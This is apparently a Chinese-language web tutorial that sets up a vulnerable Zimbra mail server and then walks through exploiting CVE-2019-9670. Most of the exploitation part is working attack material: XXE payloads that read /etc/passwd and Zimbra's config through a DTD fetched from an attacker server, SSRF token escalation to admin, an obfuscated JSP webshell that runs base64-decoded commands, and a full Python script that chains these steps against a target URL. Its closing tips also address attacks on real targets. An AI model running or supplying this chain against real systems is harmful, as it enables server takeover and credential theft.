Zimbra RCE漏洞环境搭建与利用全指南<\/h1>

环境搭建<\/h2>

系统准备<\/h3>
使用Ubuntu 14.04服务器<\/li>
更新系统源并执行系统更新<\/li>
安装必要依赖包：
apt-get install libgmp10 libperl5.18 unzip pax sysstat sqlite3 dnsmasq wget
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
主机名和DNS配置<\/h3>


修改主机名：<\/p>
vi \/etc\/hostname
<\/span><\/span><\/code><\/pre>设置为自己的域名，如：mail.test.com<\/code><\/p>
<\/li>

修改hosts文件：<\/p>
vi \/etc\/hosts
<\/span><\/span><\/code><\/pre>添加：<\/p>
192.168.37.137 mail.test.com mail
<\/code><\/pre>
<\/li>

配置dnsmasq：<\/p>
vi \/etc\/dnsmasq.conf
<\/span><\/span><\/code><\/pre>添加配置：<\/p>
server=192.168.37.137
domain=test.com
mx-host=test.com, mail.test.com, 5
mx-host=mail.test.com, mail.test.com, 5
listen-address=127.0.0.1
<\/code><\/pre>
完成后重启系统：sudo reboot<\/code><\/p>
<\/li>
<\/ol>
Zimbra安装<\/h3>


下载Zimbra 8.5.0或8.6.0版本：<\/p>
wget https:\/\/files.zimbra.com\/downloads\/8.6.0_GA\/zcs-8.6.0_GA_1153.UBUNTU14_64.20141215151116.tgz
<\/span><\/span><\/code><\/pre><\/li>

解压并安装：<\/p>
.\/install
<\/span><\/span><\/code><\/pre>安装过程中：<\/p>

遇到postfix报错可移除：apt-get remove postfix<\/code><\/li>
不需要zimbra-dnscache（已使用dnsmasq）<\/li>
提示配置MX记录时选择"no"<\/li>
<\/ul>
<\/li>

设置管理员密码（带星号为必填项）<\/p>
<\/li>

许可证设置（可随意填写，如\/etc\/passwd<\/code>）<\/p>
<\/li>

完成配置后应用更改<\/p>
<\/li>
<\/ol>
环境验证<\/h3>


切换至zimbra用户：<\/p>
su - zimbra
<\/span><\/span><\/code><\/pre><\/li>

检查服务状态：<\/p>
zmcontrol status
<\/span><\/span><\/code><\/pre>状态为"Running"表示正常<\/p>
<\/li>

访问管理界面：https:\/\/IP:7071\/zimbraAdmin\/<\/code><\/p>
<\/li>
<\/ol>
漏洞复现（CVE-2019-9670 XXE+SSRF组合拳RCE）<\/h2>
第一步：验证XXE漏洞<\/h3>
发送POST请求到\/Autodiscover\/Autodiscover.xml<\/code>：<\/p>
<!DOCTYPE xxe [
<\/span><\/span><\/span><!ELEMENT name ANY ><\/span>
<\/span><\/span><!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd" ><\/span>]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>  <Request><\/span>
<\/span><\/span>    <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>    <AcceptableResponseSchema><\/span>&xxe;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>  <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>第二步：读取Zimbra配置文件<\/h3>


准备外部DTD文件（放置在公网服务器上）：<\/p>
<!ENTITY % file SYSTEM "file:..\/conf\/localconfig.xml"><\/span>
<\/span><\/span><!ENTITY % start "<![CDATA["><\/span>
<\/span><\/span><!ENTITY % end "]]><\/span>">
<\/span><\/span><!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'><\/span>">
<\/span><\/span><\/code><\/pre><\/li>

发送POST请求：<\/p>
<\/li>
<\/ol>
<!DOCTYPE Autodiscover [
<\/span><\/span><\/span>  <!ENTITY % dtd SYSTEM "http:\/\/公网服务器\/dtd"><\/span>
<\/span><\/span>  %dtd;
<\/span><\/span>  %all;
<\/span><\/span>]>
<\/span><\/span><Autodiscover<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a"<\/span>><\/span>
<\/span><\/span>  <Request><\/span>
<\/span><\/span>    <EMailAddress><\/span>aaaaa<\/EMailAddress><\/span>
<\/span><\/span>    <AcceptableResponseSchema><\/span>&fileContents;<\/AcceptableResponseSchema><\/span>
<\/span><\/span>  <\/Request><\/span>
<\/span><\/span><\/Autodiscover><\/span>
<\/span><\/span><\/code><\/pre>第三步：获取低权限token<\/h3>
发送POST请求到\/service\/soap<\/code>或\/service\/admin\/soap<\/code>：<\/p>
<soap:Envelope<\/span> xmlns:soap=<\/span>"http:\/\/www.w3.org\/2003\/05\/soap-envelope"<\/span>><\/span>
<\/span><\/span>  <soap:Header><\/span>
<\/span><\/span>    <context<\/span> xmlns=<\/span>"urn:zimbra"<\/span>><\/span>
<\/span><\/span>      <userAgent<\/span> name=<\/span>"ZimbraWebClient - SAF3 (Win)"<\/span> version=<\/span>"5.0.15_GA_2851.RHEL5_64"<\/span>\/><\/span>
<\/span><\/span>    <\/context><\/span>
<\/span><\/span>  <\/soap:Header><\/span>
<\/span><\/span>  <soap:Body><\/span>
<\/span><\/span>    <AuthRequest<\/span> xmlns=<\/span>"urn:zimbraAccount"<\/span>><\/span>
<\/span><\/span>      <account<\/span> by=<\/span>"adminName"<\/span>><\/span>zimbra<\/account><\/span>
<\/span><\/span>      <password><\/span>上一步得到密码<\/password><\/span>
<\/span><\/span>    <\/AuthRequest><\/span>
<\/span><\/span>  <\/soap:Body><\/span>
<\/span><\/span><\/soap:Envelope><\/span>
<\/span><\/span><\/code><\/pre>第四步：获取高权限token<\/h3>


通过SSRF漏洞访问admin接口：<\/p>
POST \/service\/proxy?target=<\/span>https:\/\/127.0.0.1:7071\/service\/admin\/soap
<\/span><\/span><\/code><\/pre>或直接请求：<\/p>
POST \/service\/admin\/soap
<\/span><\/span><\/code><\/pre><\/li>

设置请求头：<\/p>
Host: [目标]:7071
Cookie: ZM_ADMIN_AUTH_TOKEN=[低权限token]
<\/code><\/pre>
<\/li>

发送相同Body内容，但修改AuthRequest<\/code>的xmlns为urn:zimbraAdmin<\/code><\/p>
<\/li>
<\/ol>
第五步：上传Webshell<\/h3>
使用获取的admin_token上传文件：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>file =<\/span> {
<\/span><\/span>    'filename1'<\/span>: (None<\/span>, "whocare"<\/span>, None<\/span>),
<\/span><\/span>    'clientFile'<\/span>: ("sunian.jsp"<\/span>, r<\/span>'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'<\/span>, "text\/plain"<\/span>),
<\/span><\/span>    'requestId'<\/span>: (None<\/span>, "12"<\/span>, None<\/span>),
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "Cookie"<\/span>: "ZM_ADMIN_AUTH_TOKEN=0_eb68a2a147c98c6d0c2257d7638c4f1256493b28_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313539323733343831303035313b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3433323433373532323b"<\/span>,
<\/span><\/span>    "Host"<\/span>: "foo:7071"<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post("https:\/\/192.168.37.137:7071\/service\/extension\/clientUploader\/upload"<\/span>, files=<\/span>file, headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>print(r.<\/span>text)
<\/span><\/span><\/code><\/pre>Webshell访问地址：https:\/\/目标IP:7071\/downloads\/sunian.jsp<\/code><\/p>
EXP编写<\/h2>
完整Python利用脚本：<\/p>
#coding=utf8<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> requests.packages.urllib3.exceptions import<\/span> InsecureRequestWarning
<\/span><\/span>requests.<\/span>packages.<\/span>urllib3.<\/span>disable_warnings(InsecureRequestWarning)
<\/span><\/span>
<\/span><\/span>base_url =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>base_url =<\/span> base_url.<\/span>rstrip("\/"<\/span>)
<\/span><\/span>filename =<\/span> "sunian.jsp"<\/span>
<\/span><\/span>fileContent =<\/span> r<\/span>'<%@page import="java.io.*"%><%@page import="sun.misc.BASE64Decoder"%><%try {String cmd = request.getParameter("tom");String path=application.getRealPath(request.getRequestURI());String dir="weblogic";if(cmd.equals("NzU1Ng")){out.print("[S]"+dir+"[E]");}byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);String xxcmd = new String(binary);Process child = Runtime.getRuntime().exec(xxcmd);InputStream in = child.getInputStream();out.print("->|");int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();out.print("|<-");try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>'<\/span>
<\/span><\/span>
<\/span><\/span>print(base_url)
<\/span><\/span>dtd_url =<\/span> "http:\/\/VPS-IP\/exp.dtd"<\/span>
<\/span><\/span>
<\/span><\/span>xxe_data =<\/span> r<\/span>"""<!DOCTYPE Autodiscover [
<\/span><\/span><\/span>  <!ENTITY <\/span>% d<\/span>td SYSTEM "<\/span>{dtd}<\/span>">
<\/span><\/span><\/span>  <\/span>%d<\/span>td;
<\/span><\/span><\/span>  <\/span>%a<\/span>ll;
<\/span><\/span><\/span>]>
<\/span><\/span><\/span><Autodiscover xmlns="http:\/\/schemas.microsoft.com\/exchange\/autodiscover\/outlook\/responseschema\/2006a">
<\/span><\/span><\/span>  <Request>
<\/span><\/span><\/span>    <EMailAddress>aaaaa<\/EMailAddress>
<\/span><\/span><\/span>    <AcceptableResponseSchema>&fileContents;<\/AcceptableResponseSchema>
<\/span><\/span><\/span>  <\/Request>
<\/span><\/span><\/span><\/Autodiscover>"""<\/span>.<\/span>format(dtd=<\/span>dtd_url)
<\/span><\/span>
<\/span><\/span># XXE stage<\/span>
<\/span><\/span>headers =<\/span> {"Content-Type"<\/span>: "application\/xml"<\/span>}
<\/span><\/span>print("[*] Get User Name\/Password By XXE "<\/span>)
<\/span><\/span>r =<\/span> requests.<\/span>post(base_url +<\/span> "\/Autodiscover\/Autodiscover.xml"<\/span>, data=<\/span>xxe_data, headers=<\/span>headers, verify=<\/span>False<\/span>, timeout=<\/span>15<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> 'response schema not available'<\/span> not<\/span> in<\/span> r.<\/span>text:
<\/span><\/span>    print("don't have xxe"<\/span>)
<\/span><\/span>    exit()
<\/span><\/span>
<\/span><\/span># low_token Stage<\/span>
<\/span><\/span>import<\/span> re
<\/span><\/span>pattern_name =<\/span> re.<\/span>compile(r<\/span>"&lt;key name=(<\/span>\"<\/span>|&quot;)zimbra_user(<\/span>\"<\/span>|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\\/value&gt;"<\/span>)
<\/span><\/span>pattern_password =<\/span> re.<\/span>compile(r<\/span>"&lt;key name=(<\/span>\"<\/span>|&quot;)zimbra_ldap_password(<\/span>\"<\/span>|&quot;)&gt;\n.*?&lt;value&gt;(.*?)&lt;\\/value&gt;"<\/span>)
<\/span><\/span>username =<\/span> pattern_name.<\/span>findall(r.<\/span>text)[0<\/span>][2<\/span>]
<\/span><\/span>password =<\/span> pattern_password.<\/span>findall(r.<\/span>text)[0<\/span>][2<\/span>]
<\/span><\/span>
<\/span><\/span>auth_body =<\/span> """<soap:Envelope xmlns:soap="http:\/\/www.w3.org\/2003\/05\/soap-envelope">
<\/span><\/span><\/span>  <soap:Header>
<\/span><\/span><\/span>    <context xmlns="urn:zimbra">
<\/span><\/span><\/span>      <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"\/>
<\/span><\/span><\/span>    <\/context>
<\/span><\/span><\/span>  <\/soap:Header>
<\/span><\/span><\/span>  <soap:Body>
<\/span><\/span><\/span>    <AuthRequest xmlns="<\/span>{xmlns}<\/span>">
<\/span><\/span><\/span>      <account by="adminName"><\/span>{username}<\/span><\/account>
<\/span><\/span><\/span>      <password><\/span>{password}<\/span><\/password>
<\/span><\/span><\/span>    <\/AuthRequest>
<\/span><\/span><\/span>  <\/soap:Body>
<\/span><\/span><\/span><\/soap:Envelope>"""<\/span>
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post(base_url +<\/span> "\/service\/admin\/soap"<\/span>, data=<\/span>auth_body.<\/span>format(xmlns=<\/span>"urn:zimbraAccount"<\/span>, username=<\/span>username, password=<\/span>password), verify=<\/span>False<\/span>)
<\/span><\/span>pattern_auth_token =<\/span> re.<\/span>compile(r<\/span>"<authToken>(.*?)<\/authToken>"<\/span>)
<\/span><\/span>low_priv_token =<\/span> pattern_auth_token.<\/span>findall(r.<\/span>text)[0<\/span>]
<\/span><\/span>
<\/span><\/span># SSRF+Get Admin_Token Stage<\/span>
<\/span><\/span>headers["Cookie"<\/span>] =<\/span> "ZM_ADMIN_AUTH_TOKEN="<\/span> +<\/span> low_priv_token +<\/span> ";"<\/span>
<\/span><\/span>headers["Host"<\/span>] =<\/span> "foo:7071"<\/span>
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post(base_url +<\/span> "\/service\/admin\/soap"<\/span>, data=<\/span>auth_body.<\/span>format(xmlns=<\/span>"urn:zimbraAdmin"<\/span>, username=<\/span>username, password=<\/span>password), headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>admin_token =<\/span> pattern_auth_token.<\/span>findall(r.<\/span>text)[0<\/span>]
<\/span><\/span>
<\/span><\/span># Upload Webshell<\/span>
<\/span><\/span>f =<\/span> {
<\/span><\/span>    'filename1'<\/span>: (None<\/span>, "whocare"<\/span>, None<\/span>),
<\/span><\/span>    'clientFile'<\/span>: (filename, fileContent, "text\/plain"<\/span>),
<\/span><\/span>    'requestId'<\/span>: (None<\/span>, "12"<\/span>, None<\/span>),
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "Cookie"<\/span>: "ZM_ADMIN_AUTH_TOKEN="<\/span> +<\/span> admin_token
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>print("[*] 木马地址"<\/span>)
<\/span><\/span>r =<\/span> requests.<\/span>post(base_url +<\/span> "\/service\/extension\/clientUploader\/upload"<\/span>, files=<\/span>f, headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>print(base_url +<\/span> "\/downloads\/"<\/span> +<\/span> filename)
<\/span><\/span>
<\/span><\/span>print("[*] 管理员cookie"<\/span>)
<\/span><\/span>print(headers['Cookie'<\/span>])
<\/span><\/span><\/code><\/pre>注意事项<\/h2>

确保DTD文件放置在可公开访问的服务器上<\/li>
上传Webshell时可能需要多次尝试<\/li>
不同Zimbra版本可能存在差异，可能需要调整payload<\/li>
实际利用时注意目标系统的防火墙和网络配置<\/li>
<\/ol>
Zimbra RCE漏洞环境搭建与利用全指南<\/h1>

环境搭建<\/h2>

注意事项<\/h2> 确保DTD文件放置在可公开访问的服务器上<\/li> 上传Webshell时可能需要多次尝试<\/li> 不同Zimbra版本可能存在差异，可能需要调整payload<\/li> 实际利用时注意目标系统的防火墙和网络配置<\/li> <\/ol>

注意事项<\/h2>

确保DTD文件放置在可公开访问的服务器上<\/li>
上传Webshell时可能需要多次尝试<\/li>
不同Zimbra版本可能存在差异，可能需要调整payload<\/li>
实际利用时注意目标系统的防火墙和网络配置<\/li> <\/ol>
